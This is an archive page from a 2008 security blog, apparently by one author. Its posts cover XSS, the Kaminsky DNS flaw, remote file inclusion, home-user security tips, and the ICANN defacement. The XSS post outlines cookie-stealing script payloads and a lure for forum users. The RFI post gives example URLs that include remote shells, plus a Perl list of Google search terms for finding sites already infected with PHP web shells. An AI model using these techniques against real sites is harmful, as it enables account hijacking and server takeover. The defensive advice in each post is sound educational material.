Archive for July, 2008

 

XSS: Stealing aint been this easy since…

Jul 29, 2008 in Security

Well DNS has definitely been a fun ride so far.  It’s being exploited in the wild, tools and scripts are available, and there are still unpatched DNS servers out in the internets.  Scurry.

So what else is there to discuss… It’s been a busy past couple of weeks so I don’t have too much to talk about.  I’ll talk about the last thing I played around with.  So I went to one of my old favorite car site forums and of course I tested to see if the search fields had input validation on special characters and if it was vulnerable to a little XSS.  I alerted the admin and I hope they fix this.  Remember to only do this on your own site or those sites you have approval on.

What is XSS?

Why reinvest the wheel?  Here is wikipedia’s definition of XSS.

Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications which allow code injection by malicious web users into the web pages viewed by other users. Examples of such code include HTML code and client-side scripts. An exploited cross-site scripting vulnerability can be used by attackers to bypass access controls such as the same origin policy. Vulnerabilities of this kind have been exploited to craft powerful phishing attacks and browser exploits.  http://en.wikipedia.org/wiki/Cross-site_scripting

So how do you test your own site if its vulnerable to XSS?

1) Try different forms, fields, places you can add uploads, or anywhere you can type for XSS.  A great test is to put this in that field <script>alert(‘hello’)</script>.  What this does, is show a popup script that says hello if that field is vulnerable to XSS.

http://securepla.net/pictures/1.jpg

This is what a vulnerable search field looks like.

http://securepla.net/pictures/2.jpeg

This is the URL that exploits that same search field.

2) Once you find a field that allows for XSS, it’s time to get creative.

3) In this case, I found a search field that allows for XSS.  So playing around with a script, I am able to take the document.cookie, which contains the session cookie, and then send it to a server of my choice.

Let me explain a little more.  When you log onto a website (with a username and password), a session cookie is generated.  This is used for authentication, session tracking, and maintaining specific information about the user.  Now, if you steal that cookie, you could replay it onto another browser, and login to the website without a username or password.  This is because, as long as you replay that session cookie, the website thinks it is the user that you stole the cookie from.

4) So how do you steal the cookie?  In the same field that you found the <script>alert(‘hello’)</script> to work, try this: <script>alert(document.cookie)</script>.  This will show your session cookie information.  Now we craft a special script using the vulnerable field that sends this session cookie to a php page that accepts the particualr parameters.  I won’t go too much in depth on this, but its all over the internets.

5) You need to now setup a site that runs PHP and allows the session cookie input and stores it.

6) This is the fun part.  What we have now is a script command using the vulnerable search field, that takes your session cookie, and sends it to a php page.  But how are users going to go to this exploit link?

Well this is where you get creative.  One example, is since this is a car forum, post this link in the forum and tell people that its a picture of your car.  Now people will click the link and their session cookie will be sent to you.  The bad part is that they will be directed to the page where you have your PHP input page.  This is quite obvious as they know something isn’t right.  So there is also a script function that allows for redirection, that you can add to your script.  So after the exploit script runs, the user is sent to anywhere you want them to go.  Why not send them to a picture of another car?  Sneaky….

So there you have it.  As long as that user doesn’t log out or their logged session doesn’t expire, you can log in as that user.  What happens if you get the admin account???

Mediation:
Developer
– I repeat this week after week, but patch!
– Make sure all fields are have input validation.  Remove such special characters as !@#$%^&*()<>?:”;’p[]\| and other characters you don’t need.
– Link IPs with session cookies.
– Test your websites

User
– Use something like NoScript if you can
– Disable client-side scripts
– Make sure you read where the link is going before you click it.

_cheetz
It’s ok to follow someones steps, but make you sure you leave your own footprint.

The sky is falling!!!

Jul 23, 2008 in Security

We have all been reading about the DNS flaw that has been traversing through the internet, originally discovered by Dan Kaminsky (http://www.doxpara.com/). The exploit was supposed to be hush hush until Aug 6 at Black Hats, giving people enough time to patch. A couple of days ago, the DNS flaw was leaked early by Matasano security. Later Matasano retracted his statement.

http://beezari.livejournal.com/141796.html
http://www.matasano.com/log/1103/reliable-dns-forgery-in-2008-kaminskys-discovery/

To make matters worse, HD Moore (founder of metasploit) published two Metasploit modules containing the exploit code to Kaminsky’s DNS Cache Poisioning Flaw.
Now its pretty much adding these modules to the Metasploit framework and clicking ‘GO’
.

CAU-EX-2008-0003 – http://www.caughq.org/exploits/2008/bailiwicked_domain.rb
CAU-EX-2008-0002 – http://www.caughq.org/exploits/2008/bailiwicked_host.rb

This exploit caches a single malicious host entry into the target nameserver. By causing the target nameserver to query for random hostnames at the target domain, the attacker can spoof a response to the target server including an answer for the query, an authority server record, and an additional record for that server, causing target nameserver to insert the additional record into the cache. – http://blogs.zdnet.com/security/?p=1545

External sources have also said that this has been translated and distributed in a multitude of other languages. It’s game on!

I have also been monitoring DNS traffic to a couple of my boxes and I have not seen a huge increase of DNS queries attempts yet. I guess it’s only a matter of time.

Mitigations:
-Patch
-Go back to static Host files and IPs
-Go back to Pen, Paper, and snail mail 🙂

MORE TO COME…

-Cheetz

Bored? Try RFI

Jul 20, 2008 in Security

As for the week, it looks like the DNS craze has died down a bit and I started looking over what other topics to add to the wiki. Looking through some notes, I thought it’d be good to mention RFI or Remote File Inclusion.

The gist of RFI is that, this isn’t a flaw of PHP, but a feature. You have the ability to define variables or addresses into the supplied command. More explained below.

Example 1
http://www.example1.com/index.php?page=archive
http://www.example2.com/index.php?page=http://www.exploitsite.com/exploit.php?

Example 2
http://www.example2.com/index.php?base_path=http://www.exploitsite.com/test.txt?ls

In example 1 we see the original call to the archive page. We see that the page variable is not initially defined and becomes defined by the index.php?page=archive. If the site allows for RFIs, we can try to run the second command, which tries to execute the exploit.php command. The include() function instructs the server to retrieve expoit.php from the remote server and run its code. Hm…. very malicious…

In Example 2
Is another type of attack trying to modify the base_path to point to the exploited site, compile and run the test.txt, and then try to run the ls (linux – list files) command.

Now you might be asking what is the test.txt file? The text file is a php file in txt file form that defines common system variables and allows a GUI shell like feeling (lookup c99.txt or r57.txt). Someone has already gone into great lengths to create the GUI PHP Shells and this GUI allows for multiple attacks. It includes, not not exclusive to, ls, cd, mkdir, ftp brute force, sql, and self removal.

So pretty much if your site allows for RFIs, this could lead to a total compromise of not just your site, but of the server.

Now the fun stuff…

So the easiest way to find some RFI accessible sites, is to find some listing of new RFI exploits. You can get out milw0rm or securityfocus.com (bugtraq). Look under RFI’s and move from there. Once you find RFIs, the world is yours (please only do this on your own boxes or with the necessary permissions).

Let me show you what a successful shell looks like:

Http://www.securepla.net/pictures/shell.JPG

Amazing! Look at all the things you get to play with!!!

Before I go into how to secure this, I want to let you know where my A.D.D. let to. So searching for c99.txt (and/or c99shell), I found a bunch of sites with c99shells still installed. I couldn’t believe that something like this would still be up… I saw a bunch of Korean sites and even a government site (not in the US) infected with this. (Remember, if you are going to test, please use TOR!. I will not be responsible for any of your actions).

So I compiled a little perl script that I found and re-edited, to look for current sites that would be infected with different PHP shells. Here is a snippet from this code that explains what it crawls in google for and what it checks on the page:

if(lc($ARGV[0]) eq “r57”) {
push(@searchTerm, “inurl:r57.php”);
push(@searchTerm, “\”[ phpinfo ] [ php.ini ] [ cpu ] [ mem ] [ users ] [ tmp ] [ delete ]\””);
push(@searchTerm, “intitle:r57shell”);
push(@checkTerm, “r57”);
push(@checkTerm, “safe_mode”);
} elsif(lc($ARGV[0]) eq “c99”) {
push(@searchTerm, “inurl:c99.php”);
push(@searchTerm, “\”Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout\””);
push(@searchTerm, “intitle:\” – phpshell\””);
push(@searchTerm, “intitle:\” – c99shell\””);
push(@checkTerm, “c99”);
push(@checkTerm, “Safe-mode”);
} elsif(lc($ARGV[0]) eq “mys”) {
push(@searchTerm, “\”Auto error traping enabled\””);
push(@searchTerm, “intitle:\”MyShell 1.1.0 build 20010923\””);
push(@checkTerm, “MyShell”);
push(@checkTerm, “Echo commands”);
} elsif(lc($ARGV[0]) eq “phs”) {
push(@searchTerm, “intitle:\”PHP Shell 1.5\””);
push(@searchTerm, “intitle:\”PHP Shell 1.6\””);
push(@searchTerm, “intitle:\”PHP Shell 1.7\””);
push(@searchTerm, “\”Enable stderr-trapping?\””);
push(@checkTerm, “PHP Shell”);
push(@checkTerm, “Choose new working”);
} elsif(lc($ARGV[0]) eq “phm”) {
push(@searchTerm, “\”PHPShell by Macker\””);
push(@searchTerm, “\”[ Main Menu ] [ PHPKonsole ] [ Haxplorer ]\””);
push(@checkTerm, “Haxplorer”);
push(@checkTerm, “PHPKonsole”);
} elsif(lc($ARGV[0]) eq “rem”) {
push(@searchTerm, “intitle:\”phpRemoteView: \””);
push(@searchTerm, “\”REMVIEW TOOLS\””);
push(@checkTerm, “phpRemoteView”);
push(@checkTerm, “perms”);
}

And then save all the outputs to a local text file. In total it took a couple hours to run (as google is pretty big these days…) but its pretty shocking how many sites are infected.

So now remidiation:

I highly recommend a tool called Goolage (download the tool here: http://www.goolag.org/download.html). What goolog does is query what ever site you put in it against a huge list of google dorks (google search commands), to find if your site is infected or vulnerable to these hundreds of vulnerable exploits. Check your own site, what is it vulnerable to?

Now back to the RFI’s. The easist way to stop RFI’s is to do some simple PHP hardening.

-Disable register_globals, allow_url_fopen
-Define each allowed page, rather than accepting all pages
-Patch
-Make sure you are on lists or regular check sites that list product vulnerabilities (or you can just check my page at http://securepla.net/rss_advisories.php)
-Test and run vulnerabilities scans on your network and websites

_CheeTz
“All your bases are belong to us”

Basic Top Tips – Home Users

Jul 14, 2008 in Security

Basic Top Tips

In terms of hackers, computers, identity theft, and information, it could be a scary world out there. A couple friends asked me to compile some basic tips to help reduce the chance of being attacked. So here it goes (and be easy, it’s been a busy week, so I thought I’d just compile a quick list).

Contents

* 1 Patch Your Operating System
* 2 Anti-Virus/Firewall
* 3 Passwords
* 4 Public Computers
* 5 Peer 2 Peer
* 6 Email
* 7 Extra Ways To Protect Yourself
* 8 And Most Important

Patch Your Operating System

Whether you are running are running Windows or have a Mac, make sure you have run the system update. Keep up-to-date!

Windows Update

Mac OS X Update


Anti-Virus/Firewall

Make sure you have anti-virus software and a firewall. A million to pick from and everyone always says theirs are better than the rest, so do your research and make sure you update that regularly, too.

* Recommendation – For Windows XP a great firewall that was directed my way is Comodo (and it’s free) Comodo

Passwords

These days complex passwords just aren’t enough. You could have P@ssW0rd!, but this isn’t good enough. Try to start using Pass Phrases. Something like “You cant hack me!” and of course add a little complexity “y0u k@n7 hh@k mmm333!”

Now the issue about remembering all these passwords…

There is a great tool called Password Safe. Password Safe This is a tool that will store all your passwords and then encrypt that file with a 256bit encryption. So all you have to do is memorize one strong and complex pass phrase to open this safe of all your passwords. Now you can have all different passwords for every credit card website, bank, and etc. You can even carry this on a flash drive so that you will always have it with you. Just remember to make the Password Safe password very complex.

Also, try to rotate your passwords regularly. Meaning make sure you change your passwords often enough that if someone does get your password, they won’t have it for long.


Public Computers

Do not ever use public computers, computers at your hotel, or even at the airport to log into your email, vpn, access private information, or even facebook. I have found many of these computers infected with keyloggers and other malicious tools. Just don’t do it. It’s not cool…

Peer 2 Peer

I know everyone loves to use Limewire to download free software, music, games, and etc, but don’t! Not because it’s immoral and wrong (lol) but because many of these have viruses and other bad things attached to them. Have you ever wondered why so many people are uploading all these files for free?
Email

Spam is still a great median to spread viruses and worms. I know you’ve been told a million times not to open email from people you don’t know and most of all don’t open those attachments, but people are still doing it today!!!! Stop it!

Extra Ways To Protect Yourself

NoScript

If you are using Firefox a great addon is called “NoScript“. Once this is active, whenever you visit a page, it will deny all scripts. Scripts are actions that are supposed to happen when you access a webpage. You will see a crossed out ‘S’ at the bottom right corner of your browser. When you access new page, you can right click on the crossed out ‘S’ and only allow whatever scripts you want to run. Although this might be for more advanced users, this will protect you from a large number of exploits via the browser. More information here: NoScript Give it a read! It’s well worth it.

Site Advisor McAfee site advisor

Unsure about whether a page might have some malicious content before you access it? Go to McAfee’s site advisor and type in the questionable URL (site) at the bottom of the page, where it says “Look up a site report”. It will tell you what other people have found. Also, you can download a plugin for IE (and I think firefox).

Peer Guardian

If you are going to use bittorrent and download movies, music, games, and etc off the internet, look at a product called Peer Guardian to protect you. PeerGuardian 2 is a premier IP blocker for Windows. PeerGuardian 2 integrates support for multiple lists, list editing, automatic updates, and blocking all of IPv4 (TCP, UDP, ICMP, etc), making it the safest and easiest way to protect your privacy on P2P.

Basically this means that someone has compiled a list of all bad IPs, government IPs, RIAA type IPs, and more. So if you try to download a file off of one of them or they try to download a file off of you, the connection will be blocked. Just one more layer of protection. Give it a try!

If you can think of more email me at admin[at]securepla..net

And Most Important!!!!!

IF IT SEEMS TO GOOD TO BE TRUE… IT IS

_Cheetz

Huge flaw in DNS

Jul 09, 2008 in Security

Spreading like wild fires in California, Dan Kaminsky released today a flaw in DNS, that lies in the DNS Protocol (when was the last time you heard of a flaw like this). If exploited,an attacker has the potential to dns cache poison so that a user would contact the incorrect, and possibly malicious, hosts for particular services. This pretty much affects almost all vendors that deal with DNS, but Dan has been working with Cert and multiple vendors to make sure that patches are released. So patch up! Here is a quick overview from Sans.org

  • This only affects caching/resolving name servers. Authoritative name servers are not affected as they only send responses and will never receive responses (only queries).
  • The patch will impact your servers performance. Test carefully before patching a very busy server.
  • For BIND users, there is a non-IETF approved workaround to implement DNSSEC without full PKI. See “DNSSEC Look-aside Validation” for details.
  • The overall issue has been known for a long time, and is a fundamental problem with the way DNS currently works. However, full details about what makes this so special will be revealed at Blackhat. There may be more to it. For example think about better tools to exploit it and exploits see in the wild.
  • Please test carefully. At least Zonealarm seems to have problems with the respective Microsoft patch. Other firewalls may be “surprised” too by your DNS server all for sudden changing ports a lot.
  • Don’t forget embedded devices. In particular BIND is frequently used as a DNS server on firewalls and routers. If you don’t need it: disable it.
  • Stay in touch with your vendors. Please let them know if you experience any issues

Go here to check if your DNS server is vulnerable: http://www.doxpara.com/

Links with more info:

http://online.wsj.com/article/SB121557348238938533.html?mod=googlenews_wsj

http://isc.sans.org/diary.html

http://www.kb.cert.org/vuls/id/800113

More to come later.

_Cheetz

ICANN/IANA hacked…

Jul 03, 2008 in Security

In recent news, IANA (Internet Assigned Names Authority) and ICANN (Internet Corporation for Assigned Names and Numbers), were hacked and had their site redirected to atspace[dot]com. For those that don’t know the purpose of IANA/ICANN, they pretty much have responsibility on IP address space allocation and Top Level Domains. So they pretty much regulate ip and naming system for the internet, but have no bearing on internet content. On atspace[dot]com’s site, it stated that:

# NeTDevilz #

You think that you control the domains but you don’t! Everybody knows wrong. We control the domains including ICANN!

Don’t you believe us?

haha 🙂
(Lovable Turkish hackers group)

©2008 NetDevilz Co.
We’re not first,But We’re the BEST!

This attack happened right after ICANN announced that they would be expanding the number to Top Level Domains (TLD’s). Hmmm… any coincidence?

“ICANN approved two proposals in a vote today (6.26.08) in Paris: the first would allow virtually any combination up to 64 characters to be used as a TLD; the second would also allow the use of non-Latin characters, such as Mandarin, to be used to designate TLDs.” -pcmag.com

So after I read about the IANA hack, I started searching around for what exactly had been done and who. This was an attack from NetDevilz who recently also hacked photobucket. Although I couldn’t find the exact exploit (and it seems that IANA hasn’t found out either but speculations to XSRF), I stumbled on a Turkish page called turk-h[dot]com (please use no script as I do not trust this site). This is a Turkish website dedicated to hacking and boasting on the number of websites compromised. Pretty much you register a user or your group on this site and you get a point for hacking a website. It’s pretty much like a game except on the oh so real internet and yup of course NetDevilz was listed on this site. The site also described different techniques, news, and a bunch of other things I couldn’t understand (need to learn turkish).

Also searching around, I stumbled across another page, thedarkvisitor.com, that discusses Chinese hacker attacks, trends, and other security sorts. Luckily, this one is written in English. Recently, a new tool was release called, Chinese vampire (trojan download), that had some pretty complex and malicious, but effective attacks. I need to get my hands on this and see what it’s about.

All in all, I am throughly impressed that NetDevilz was able to hack IANA/ICANN, even if it was only for 20 minutes. It has become so important in the security world to understand the hacker trends, exploits, tools, and culture internationally. The hardest part though has been through the translation, as I don’t speak these languages. If anyone knows any other good sites on hacker trends and are either in English or can be translated (via Google or babble), let me know.

_Cheetz
“Nichts ist wahr, alles ist erlaubt”
From the movie 23. http://www.imdb.com/title/tt0126765/